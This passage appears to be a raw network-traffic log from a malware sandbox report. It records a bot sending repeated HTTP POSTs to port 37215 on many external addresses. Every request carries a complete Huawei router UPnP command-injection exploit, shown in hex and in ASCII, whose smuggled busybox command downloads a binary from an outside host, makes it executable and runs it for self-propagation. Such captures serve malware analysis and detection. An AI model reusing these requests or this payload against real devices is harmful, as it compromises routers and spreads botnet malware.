6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  712192.168.2.1348762211.227.246.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313246965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  713192.168.2.134218841.45.37.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313247919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  714192.168.2.1345894157.159.181.4537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313268900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  715192.168.2.1352772157.217.224.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313271999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  716192.168.2.134516841.114.218.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313294888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  717192.168.2.135070831.224.218.8737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313297033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  718192.168.2.1336488197.176.226.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313323975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  719192.168.2.1360938157.29.16.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313354015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  720192.168.2.1347900197.15.104.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313366890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  721192.168.2.1344684157.237.59.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313405037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  722192.168.2.1353244157.149.154.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313522100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
